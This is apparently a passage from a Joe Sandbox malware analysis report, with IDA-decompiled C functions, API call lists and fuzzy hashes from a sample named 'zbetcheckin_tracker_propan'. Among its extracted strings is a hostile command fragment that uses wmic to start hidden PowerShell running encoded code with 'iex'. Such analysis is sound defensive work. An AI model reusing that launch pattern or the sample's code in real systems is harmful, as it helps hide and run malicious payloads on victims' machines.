      													__eflags = _t86;
      													 *0x4054d0 = _t86;
      												}
      												goto L58;
      											} else {
      												do {
      													_t68 = 0x4054d8 + _t94 * 4;
      													_t94 = _t94 + 1;
      													__eflags = _t94 - _t77;
      													 *_t68 = _t110;
      													_t110 =  *_t68;
      												} while (_t94 <= _t77);
      												goto L56;
      											}
      										}
      										_t69 = 0x4054d4 + _t84 * 4;
      										while(1) {
      											__eflags =  *_t69 - _t110;
      											if( *_t69 == _t110) {
      												goto L51;
      											}
      											_t93 = _t93 - 1;
      											_t69 = _t69 - 4;
      											__eflags = _t93;
      											if(_t93 > 0) {
      												continue;
      											}
      											goto L51;
      										}
      										goto L51;
      									}
      									_t87 = _v32;
      									__eflags =  *_t87 - 0x5a4d;
      									if( *_t87 != 0x5a4d) {
      										goto L59;
      									}
      									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
      									__eflags =  *_t71 - 0x4550;
      									if( *_t71 != 0x4550) {
      										goto L59;
      									}
      									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
      									if( *((short*)(_t71 + 0x18)) != 0x10b) {
      										goto L59;
      									}
      									_t78 = _t76 - _t87;
      									__eflags =  *((short*)(_t71 + 6));
      									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
      									if( *((short*)(_t71 + 6)) <= 0) {
      										goto L59;
      									}
      									_t72 =  *((intOrPtr*)(_t89 + 0xc));
      									__eflags = _t78 - _t72;
      									if(_t78 < _t72) {
      										goto L46;
      									}
      									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
      									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
      										goto L46;
      									}
      									__eflags =  *(_t89 + 0x27) & 0x00000080;
      									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
      										goto L20;
      									}
      									goto L46;
      								}
      							} else {
      								goto L16;
      							}
      							while(1) {
      								L16:
      								__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
      								if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
      									break;
      								}
      								_t58 = _t58 + 1;
      								__eflags = _t58 - _t81;
      								if(_t58 < _t81) {
      									continue;
      								}
      								goto L18;
      							}
      							__eflags = _t58;
      							if(_t58 <= 0) {
      								goto L5;
      							}
      							 *0x405518 = 1;
      							__eflags =  *0x405518;
      							if( *0x405518 != 0) {
      								goto L5;
      							}
      							__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
      							if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
      								L32:
      								_t100 = 0;
      								__eflags = _t58;
      								if(_t58 < 0) {
      									L34:
      									 *0x405518 = 0;
      									goto L5;
      								} else {
      									goto L33;
      								}
      								do {
      									L33:
      									_t90 = 0x4054d8 + _t100 * 4;
      									_t100 = _t100 + 1;
      									__eflags = _t100 - _t58;
      									 *_t90 = _t110;
      									_t110 =  *_t90;
      								} while (_t100 <= _t58);
      								goto L34;
      							}
      							_t25 = _t81 - 1; // -1
      							_t58 = _t25;
      							__eflags = _t58;
      							if(_t58 < 0) {
      								L28:
      								__eflags = _t81 - 0x10;
      								if(_t81 < 0x10) {
      									_t81 = _t81 + 1;
      									__eflags = _t81;
      									 *0x4054d0 = _t81;
      								}
      								_t28 = _t81 - 1; // 0x0
      								_t58 = _t28;
      								goto L32;
      							} else {
      								goto L25;
      							}
      							while(1) {
      								L25:
      								__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
      								if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
      									break;
      								}
      								_t58 = _t58 - 1;
      								__eflags = _t58;
      								if(_t58 >= 0) {
      									continue;
      								}
      								break;
      							}
      							__eflags = _t58;
      							if(__eflags >= 0) {
      								if(__eflags == 0) {
      									goto L34;
      								}
      								goto L32;
      							}
      							goto L28;
      						}
      						_t75 =  *((intOrPtr*)(_t108 - 8));
      						__eflags = _t75 - _v8;
      						if(_t75 < _v8) {
      							goto L20;
      						}
      						__eflags = _t75 - _t108;
      						if(_t75 >= _t108) {
      							goto L20;
      						}
      						goto L15;
      					}
      					L5:
      					_t63 = 1;
      					goto L60;
      				} else {
      					goto L3;
      				}
      			}




































      APIs
      • NtQueryVirtualMemory.NTDLL ref: 0040323E
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: MemoryQueryVirtual
      • String ID:
      • API String ID: 2850889275-0
      • Opcode ID: acb388311d9507e765e57883f4f0fb462627ea4d4fd5b39d7bafb66c9a769686
      • Instruction ID: 78077c6edd7102824a81ad90397cfc8d0478216482ea5665405657b9022bdeaa
      • Opcode Fuzzy Hash: acb388311d9507e765e57883f4f0fb462627ea4d4fd5b39d7bafb66c9a769686
      • Instruction Fuzzy Hash: C761CB306106019FCB25CF29C9C076A7BA9EB95717B24857FD805EB2D4E738DE42875C
      APIs
      • GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,?), ref: 004134D2
        • Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
        • Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412B1D
        • Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(004181C4), ref: 00412B28
        • Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
        • Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerInfoLocalePresentTerminate
      • String ID:
      • API String ID: 3162229498-0
      • Opcode ID: 917dc916ca7e34ff7e30c23fa1b53dfb2e25eb24efc0ba39e81883e36cf0dc12
      • Instruction ID: b4fad6471f6f340e46c7e6d4daddbad7cdec23d7ddf9036f4d6e5afb2c261bc1
      • Opcode Fuzzy Hash: 917dc916ca7e34ff7e30c23fa1b53dfb2e25eb24efc0ba39e81883e36cf0dc12
      • Instruction Fuzzy Hash: 53E09B30B08208AEDB11DFB4D845BDE77B8AF0C718F80417AF511D61D1D778D7448659
      C-Code - Quality: 89%
      			E004134B0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, int _a4) {
      				signed int _v8;
      				char _v10;
      				char _v16;
      				signed int _t7;
      				signed int _t10;
      				signed int _t12;
      				intOrPtr _t14;
      				intOrPtr _t18;
      				intOrPtr _t19;
      				intOrPtr _t20;
      				signed int _t21;
      
      				_t20 = __esi;
      				_t19 = __edi;
      				_t18 = __edx;
      				_t14 = __ebx;
      				_t7 =  *0x42c4a0; // 0xe190ffa3
      				_v8 = _t7 ^ _t21;
      				_v10 = 0;
      				_t10 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
      				if(_t10 != 0) {
      					_t12 = E00415F6F( &_v16);
      				} else {
      					_t12 = _t10 | 0xffffffff;
      				}
      				return E0040FE9A(_t12, _t14, _v8 ^ _t21, _t18, _t19, _t20);
      			}

      APIs
      • GetLocaleInfoA.KERNEL32(7FFFFFFF,00001004,00000000,00000006,00000000,7FFFFFFF,00000000,?,?,?,00410C10,01D31728,?,?), ref: 004134D2
        • Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
        • Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
        • Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
        • Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
        • Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerInfoLocalePresentTerminate
      • String ID:
      • API String ID: 3162229498-0
      • Opcode ID: 656ca1a91e6beee6f2877c3f0947bd718e00ffcf6520868461cacd17f74082df
      • Instruction ID: b4fad6471f6f340e46c7e6d4daddbad7cdec23d7ddf9036f4d6e5afb2c261bc1
      • Opcode Fuzzy Hash: 656ca1a91e6beee6f2877c3f0947bd718e00ffcf6520868461cacd17f74082df
      • Instruction Fuzzy Hash: 53E09B30B08208AEDB11DFB4D845BDE77B8AF0C718F80417AF511D61D1D778D7448659
      C-Code - Quality: 37%
      			E00402749(intOrPtr _a4, intOrPtr _a8) {
      				void* _t3;
      				intOrPtr* _t6;
      
      				_t6 =  *0x40501c;
      				_t3 = 0x7f;
      				if(_t6 != 0) {
      					return RtlNtStatusToDosError( *_t6(_a4, _a8));
      				}
      				return _t3;
      			}

      APIs
      • RtlNtStatusToDosError.NTDLL ref: 00402761
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ErrorStatus
      • String ID:
      • API String ID: 1596131371-0
      • Opcode ID: ee30a3aab0a8afbbbd2c55dcafa8b4b57ff950f5befaa10d6ea191f9ba838e5e
      • Instruction ID: f5cab280cc5f0981f9fdb10a19465466d077b01224edd2b38ec2dd1a7d3f75c5
      • Opcode Fuzzy Hash: ee30a3aab0a8afbbbd2c55dcafa8b4b57ff950f5befaa10d6ea191f9ba838e5e
      • Instruction Fuzzy Hash: BAC01271604201EBEA18AB21DE1D93FBA11FB90340F00442DB249A10F0C6749850DA15
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID: N@
      • API String ID: 2579439406-1509896676
      • Opcode ID: d80ac28e40a82e2140494de85e0c141f2dfcabb1530c75b28e88de08726555fa
      • Instruction ID: 3422558f80033e691d449cf213abf6e5ddd7a077f490a086ba894b671f380026
      • Opcode Fuzzy Hash: d80ac28e40a82e2140494de85e0c141f2dfcabb1530c75b28e88de08726555fa
      • Instruction Fuzzy Hash: BA618C71A012268FCB18CF48C5945AAF7B2FF89304B5AC1AED9096B366C774DD81CBC4
      C-Code - Quality: 78%
      			E004160BE(char* _a4, intOrPtr _a8, unsigned int* _a12) {
      				signed int _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				unsigned int _v20;
      				signed int _v24;
      				unsigned int _v28;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				signed int _t75;
      				unsigned int* _t77;
      				unsigned int _t80;
      				unsigned int _t83;
      				unsigned int _t84;
      				unsigned int _t85;
      				signed int _t87;
      				signed int _t90;
      				signed int _t100;
      				signed int _t107;
      				unsigned int _t108;
      				unsigned int _t110;
      				unsigned int _t111;
      				signed int _t116;
      				unsigned int _t118;
      				unsigned int _t120;
      				signed int _t122;
      				intOrPtr _t123;
      				unsigned int _t133;
      				unsigned int _t135;
      				unsigned int _t138;
      				unsigned int _t145;
      				void* _t146;
      				unsigned int _t150;
      				unsigned int _t151;
      				signed int _t152;
      
      				_t75 =  *0x42c4a0; // 0xe190ffa3
      				_v8 = _t75 ^ _t152;
      				_t77 = _a12;
      				_t137 = 0;
      				_v28 = 0x404e;
      				 *_t77 = 0;
      				_t77[1] = 0;
      				_t77[2] = 0;
      				if(_a8 <= 0) {
      					L27:
      					while(_t77[2] == _t137) {
      						_t90 = _t77[1];
      						_t77[2] = _t90 >> 0x10;
      						_t116 =  *_t77;
      						_t130 = _t116 >> 0x10;
      						_t113 = _t116 << 0x10;
      						_v28 = _v28 + 0xfff0;
      						_t77[1] = _t90 << 0x00000010 | _t116 >> 0x00000010;
      						 *_t77 = _t116 << 0x10;
      					}
      					if((_t77[2] & 0x00008000) != 0) {
      						L30:
      						_t77[2] = _v28;
      						return E0040FE9A(_t77, 0x8000, _v8 ^ _t152, _t113, _t130, _t137);
      					} else {
      						goto L29;
      					}
      					do {
      						L29:
      						_t138 =  *_t77;
      						_t130 = _t77[1];
      						_v28 = _v28 + 0xffff;
      						 *_t77 = _t138 + _t138;
      						_t137 = _t130 + _t130 | _t138 >> 0x0000001f;
      						_t113 = _t130 >> 0x1f;
      						_t100 = _t77[2] + _t77[2] | _t130 >> 0x0000001f;
      						_t77[1] = _t130 + _t130 | _t138 >> 0x0000001f;
      						_t77[2] = _t100;
      					} while ((0x00008000 & _t100) == 0);
      					goto L30;
      				} else {
      					goto L1;
      				}
      				do {
      					L1:
      					_t118 =  *_t77;
      					_t80 = _t77[1];
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t133 = _t118 + _t118;
      					_t120 = _t80 + _t80 | _t118 >> 0x0000001f;
      					_v24 = _t133;
      					_v24 = _v24 & 0x00000000;
      					_t107 = (_t77[2] + _t77[2] | _t80 >> 0x0000001f) + (_t77[2] + _t77[2] | _t80 >> 0x0000001f) | _t120 >> 0x0000001f;
      					_t83 = _v20;
      					_t145 = _t133 + _t133;
      					_t122 = _t120 + _t120 | _t133 >> 0x0000001f;
      					_t135 = _t145 + _t83;
      					 *_t77 = _t145;
      					_t77[1] = _t122;
      					_t77[2] = _t107;
      					if(_t135 < _t145 || _t135 < _t83) {
      						_v24 = 1;
      					}
      					_t84 = 0;
      					 *_t77 = _t135;
      					if(_v24 != 0) {
      						_t151 = _t122 + 1;
      						if(_t151 < _t122 || _t151 < 1) {
      							_t84 = 1;
      						}
      						_t77[1] = _t151;
      						if(_t84 != 0) {
      							_t77[2] = _t107 + 1;
      						}
      					}
      					_t108 = _t77[1];
      					_t123 = _v16;
      					_t85 = _t108 + _t123;
      					_t146 = 0;
      					if(_t85 < _t108 || _t85 < _t123) {
      						_t146 = 1;
      					}
      					_t77[1] = _t85;
      					if(_t146 != 0) {
      						_t77[2] = _t77[2] + 1;
      					}
      					_t77[2] = _t77[2] + _v12;
      					_v24 = _v24 & 0x00000000;
      					_t110 = _t135 + _t135;
      					_t130 = _t85 + _t85 | _t135 >> 0x0000001f;
      					_t87 = _t77[2] + _t77[2] | _t85 >> 0x0000001f;
      					 *_t77 = _t110;
      					_t77[1] = _t130;
      					_t77[2] = _t87;
      					_t113 =  *_a4;
      					_t150 = _t110 + _t113;
      					_v20 = _t113;
      					if(_t150 < _t110 || _t150 < _t113) {
      						_v24 = 1;
      					}
      					 *_t77 = _t150;
      					if(_v24 != 0) {
      						_t111 = _t130 + 1;
      						if(_t111 < _t130 || _t111 < 1) {
      							_t113 = 1;
      						}
      						_t77[1] = _t111;
      						if(_t113 != 0) {
      							_t77[2] = _t87 + 1;
      						}
      					}
      					_a8 = _a8 - 1;
      					_a4 = _a4 + 1;
      				} while (_a8 > 0);
      				_t137 = 0;
      				goto L27;
      			}

      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID: N@
      • API String ID: 2579439406-1509896676
      • Opcode ID: 9fe50ee4c59856ef6abc79d150c0dfa5fe7e8f2f7ce7fd62ec84fea8bdbaea2c
      • Instruction ID: 3422558f80033e691d449cf213abf6e5ddd7a077f490a086ba894b671f380026
      • Opcode Fuzzy Hash: 9fe50ee4c59856ef6abc79d150c0dfa5fe7e8f2f7ce7fd62ec84fea8bdbaea2c
      • Instruction Fuzzy Hash: BA618C71A012268FCB18CF48C5945AAF7B2FF89304B5AC1AED9096B366C774DD81CBC4
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011253056.0000000000250000.00000040.sdmp, Offset: 00250000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_250000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID: .dll
      • API String ID: 0-2738580789
      • Opcode ID: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
      • Instruction ID: 2e47b18815009eb9dddcda75f3901438b3a7e51aa741c7fc304c0736e1f7fbb2
      • Opcode Fuzzy Hash: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
      • Instruction Fuzzy Hash: 5E516D70920219DBCB24CF55C9C07AEB7B1FF0530BF10866AD8559B651D374AAA8CF98
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011296226.0000000000290000.00000040.sdmp, Offset: 00290000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_290000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID: .dll
      • API String ID: 0-2738580789
      • Opcode ID: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
      • Instruction ID: 31e531697a6c85454f36deb3f876d9c8346eca16f1ad4544d61d93cb6ad23646
      • Opcode Fuzzy Hash: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
      • Instruction Fuzzy Hash: A9517B30A2021DEFCF24DF55C4C07ADB7B5BF04305F5181AAD949AB641D7B4AAA4CF94
      C-Code - Quality: 76%
      			E0040D4F0(intOrPtr __edx, signed int _a4, signed int* _a8, intOrPtr _a12) {
      				signed int* _v0;
      				intOrPtr _v4;
      				char _v8;
      				char _v12;
      				signed int _v16;
      				char _v17;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				void* _t58;
      				signed int _t65;
      				signed int _t66;
      				signed int* _t69;
      				intOrPtr _t70;
      				signed int* _t77;
      				signed int _t97;
      				signed int _t109;
      				signed int _t111;
      				signed int _t114;
      				signed int _t116;
      				void* _t126;
      
      				_t106 = __edx;
      				_t77 = _a8;
      				_t114 = _t77[2] ^  *0x42c4a0;
      				_t55 =  *_t114;
      				_v17 = 0;
      				_v12 = 1;
      				_t111 =  &(_t77[4]);
      				if( *_t114 != 0xfffffffe) {
      					E0040FE9A(_t55, _t77,  *((intOrPtr*)(_t114 + 4)) + _t111 ^  *(_t55 + _t111), __edx, _t111, _t114);
      				}
      				E0040FE9A( *((intOrPtr*)(_t114 + 8)), _t77,  *((intOrPtr*)(_t114 + 0xc)) + _t111 ^  *( *((intOrPtr*)(_t114 + 8)) + _t111), _t106, _t111, _t114);
      				_t58 = _a4;
      				if(( *(_t58 + 4) & 0x00000066) != 0) {
      					__eflags = _t77[3] - 0xfffffffe;
      					if(_t77[3] == 0xfffffffe) {
      						goto L13;
      					}
      					_t107 = 0xfffffffe;
      					E00411854(_t77, 0xfffffffe, _t111, 0x42c4a0);
      				} else {
      					_t116 = _t77[3];
      					_t107 =  &_v8;
      					_v8 = _t58;
      					_v4 = _a12;
      					 *((intOrPtr*)(_t77 - 4)) =  &_v8;
      					if(_t116 == 0xfffffffe) {
      						L13:
      						return _v12;
      					} else {
      						goto L4;
      					}
      					do {
      						L4:
      						_t65 = _t116 + _t116 * 2;
      						_t90 =  *((intOrPtr*)(_t114 + 0x14 + _t65 * 4));
      						_t77 = _t114 + 0x10 + _t65 * 4;
      						_t66 =  *_t77;
      						_v16 = _t66;
      						if( *((intOrPtr*)(_t114 + 0x14 + _t65 * 4)) == 0) {
      							goto L8;
      						}
      						_t107 = _t111;
      						_t126 = E0041180A(_t90, _t111);
      						_v17 = 1;
      						if(_t126 < 0) {
      							_v12 = 0;
      							L10:
      							_t61 =  *_t114;
      							if( *_t114 != 0xfffffffe) {
      								E0040FE9A(_t61, _t77,  *((intOrPtr*)(_t114 + 4)) + _t111 ^  *(_t61 + _t111), _t107, _t111, _t114);
      							}
      							E0040FE9A( *((intOrPtr*)(_t114 + 8)), _t77,  *((intOrPtr*)(_t114 + 0xc)) + _t111 ^  *( *((intOrPtr*)(_t114 + 8)) + _t111), _t107, _t111, _t114);
      							goto L13;
      						}
      						if(_t126 > 0) {
      							__eflags =  *_a4 - 0xe06d7363;
      							if( *_a4 == 0xe06d7363) {
      								__eflags =  *0x436bfc;
      								if(__eflags != 0) {
      									_push(0x436bfc);
      									_t67 = E00411362(_t77, _t111, _t114, __eflags);
      									__eflags = _t67;
      									if(_t67 != 0) {
      										_t107 = _a4;
      										_t67 =  *0x436bfc(_a4, 1);
      									}
      								}
      							}
      							E0041183A(_t67, _a8);
      							_t69 = _a8;
      							__eflags = _t69[3] - _t116;
      							if(_t69[3] != _t116) {
      								_t107 = _t116;
      								E00411854(_t69, _t116, _t111, 0x42c4a0);
      								_t69 = _v0;
      							}
      							_t69[3] = _v16;
      							_t70 =  *_t114;
      							__eflags = _t70 - 0xfffffffe;
      							if(_t70 != 0xfffffffe) {
      								__eflags =  *((intOrPtr*)(_t114 + 4)) + _t111 ^  *(_t70 + _t111);
      								_t70 = E0040FE9A(_t70, _t77,  *((intOrPtr*)(_t114 + 4)) + _t111 ^  *(_t70 + _t111), _t107, _t111, _t114);
      							}
      							E0040FE9A(_t70, _t77,  *((intOrPtr*)(_t114 + 0xc)) + _t111 ^  *( *((intOrPtr*)(_t114 + 8)) + _t111),  *((intOrPtr*)(_t114 + 8)), _t111, _t114);
      							_t97 = _t77[2];
      							_t109 = _t111;
      							E00413DF9(_t97, _t109, 1);
      							goto __esi;
      						}
      						_t66 = _v16;
      						L8:
      						_t116 = _t66;
      					} while (_t66 != 0xfffffffe);
      					if(_v17 == 0) {
      						goto L13;
      					}
      				}
      			}

      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Filter$ExceptionProcessUnhandled$CallCurrentDebuggerFunc@8PresentTerminateUnwind
      • String ID: csm
      • API String ID: 4279868475-945121583
      • Opcode ID: 7f8dbafe797af72c27f8246625a5154135670d5f8700303a741559603f0c89aa
      • Instruction ID: 7636f90b0f1c14c5d2783b01228ece5142a43747b957611b9dc2045ec2fcdf5b
      • Opcode Fuzzy Hash: 7f8dbafe797af72c27f8246625a5154135670d5f8700303a741559603f0c89aa
      • Instruction Fuzzy Hash: C65185306043018FC724DF69C891A6BB7E1AF85328F54897EE856973E2CB39EC49CB55
      Strings
      • %systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII., xrefs: 002D42CB, 002D42D0, 002D42EA
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$AllocateFree
      • String ID: %systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.
      • API String ID: 2488874121-4058178351
      • Opcode ID: ca5157170fa793238ab02b4a3d8840f3cba4ca901d43e7508489ef1228657454
      • Instruction ID: c5e0ccde82d0a77229a3cd1888a7c619b031f7d61e34add79155ac3488d4d86a
      • Opcode Fuzzy Hash: ca5157170fa793238ab02b4a3d8840f3cba4ca901d43e7508489ef1228657454
      • Instruction Fuzzy Hash: A4E0122261253737023175AB5C58EA7EA5C9E567E23550223BD08D3701EB15DC6145F0
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID:
      • API String ID: 2579439406-0
      • Opcode ID: e3c7bf9c222568088675305754680de23a458daff8bb14792d4bbad8b19d04a0
      • Instruction ID: be2820b812828461db64683cad85a0873d12b28c68765580b26a87767bbd0006
      • Opcode Fuzzy Hash: e3c7bf9c222568088675305754680de23a458daff8bb14792d4bbad8b19d04a0
      • Instruction Fuzzy Hash: 5E227731E442088BDF24CFA8C4503EEBBB2FB99315F65812BD456AB385D77858C6CB49
      C-Code - Quality: 18%
      			E0041498B(signed int __edx, signed int* _a4, signed int _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, intOrPtr* _a32) {
      				signed int _v8;
      				char _v13;
      				char _v36;
      				short _v38;
      				signed int _v40;
      				signed int _v42;
      				signed int _v44;
      				signed int _v46;
      				signed int _v48;
      				signed int _v54;
      				signed int _v56;
      				signed int _v58;
      				signed int _v60;
      				signed int _v62;
      				signed int _v64;
      				char _v74;
      				char _v76;
      				signed int _v80;
      				signed int _v84;
      				signed int _v88;
      				signed int _v92;
      				signed short* _v96;
      				signed short* _v100;
      				signed int _v104;
      				signed int _v108;
      				signed int _v112;
      				signed int _v116;
      				signed int _v120;
      				signed int _v124;
      				signed int* _v128;
      				void* __ebx;
      				char* __edi;
      				signed int __esi;
      				signed int _t229;
      				intOrPtr _t233;
      				intOrPtr _t234;
      				intOrPtr _t238;
      				intOrPtr* _t264;
      				signed int _t271;
      				intOrPtr* _t309;
      				signed int _t328;
      				signed int _t339;
      
      				_t308 = __edx;
      				_t229 =  *0x42c4a0; // 0xe190ffa3
      				_v8 = _t229 ^ _t339;
      				_t266 = 0;
      				_v128 = _a4;
      				_t328 = 1;
      				_t271 = 0;
      				_t343 = _a32;
      				_v116 = _a8;
      				_t320 =  &_v36;
      				_v120 = 0;
      				_v108 = 1;
      				_v80 = 0;
      				_v92 = 0;
      				_v96 = 0;
      				_v100 = 0;
      				_v104 = 0;
      				_v84 = 0;
      				_v112 = 0;
      				if(_a32 != 0) {
      					_t309 = _a12;
      					_v88 = _t309;
      					while(1) {
      						_t233 =  *_t309;
      						__eflags = _t233 - 0x20;
      						if(_t233 == 0x20) {
      							goto L7;
      						}
      						__eflags = _t233 - 9;
      						if(_t233 == 9) {
      							goto L7;
      						}
      						__eflags = _t233 - 0xa;
      						if(_t233 == 0xa) {
      							goto L7;
      						}
      						__eflags = _t233 - 0xd;
      						if(_t233 != 0xd) {
      							_t266 = 0x30;
      							while(1) {
      								L9:
      								_t234 =  *_t309;
      								_t309 = _t309 + 1;
      								__eflags = _t271 - 0xb;
      								if(_t271 > 0xb) {
      									break;
      								}
      								switch( *((intOrPtr*)(_t271 * 4 +  &M0041501F))) {
      									case 0:
      										__eflags = _t234 - 0x31 - 8;
      										if(_t234 - 0x31 > 8) {
      											_t305 =  *_a32;
      											__eflags = _t234 -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t305 + 0xbc))))));
      											if(_t234 !=  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t305 + 0xbc))))))) {
      												_t260 = _t234 - 0x2b;
      												__eflags = _t260;
      												if(_t260 == 0) {
      													_v120 = _v120 & 0x00000000;
      													_push(2);
      													_pop(_t271);
      													goto L9;
      												}
      												_t262 = _t260;
      												__eflags = _t262;
      												if(_t262 == 0) {
      													_push(2);
      													_pop(_t271);
      													_v120 = 0x8000;
      													goto L9;
      												}
      												__eflags = _t262 != 3;
      												if(_t262 != 3) {
      													goto L76;
      												}
      												goto L20;
      											}
      											goto L15;
      										}
      										goto L12;
      									case 1:
      										__eflags = __al - 0x31 - 8;
      										_v92 = __esi;
      										if(__al - 0x31 <= 8) {
      											goto L12;
      										}
      										_a32 =  *_a32;
      										__ecx =  *( *_a32 + 0xbc);
      										__ecx =  *( *( *_a32 + 0xbc));
      										__eflags = __al -  *__ecx;
      										if(__al !=  *__ecx) {
      											__eflags = __al - 0x2b;
      											if(__al == 0x2b) {
      												goto L34;
      											}
      											__eflags = __al - 0x2d;
      											if(__al == 0x2d) {
      												goto L34;
      											}
      											__eflags = __al - __bl;
      											if(__al == __bl) {
      												goto L20;
      											}
      											goto L29;
      										}
      										goto L25;
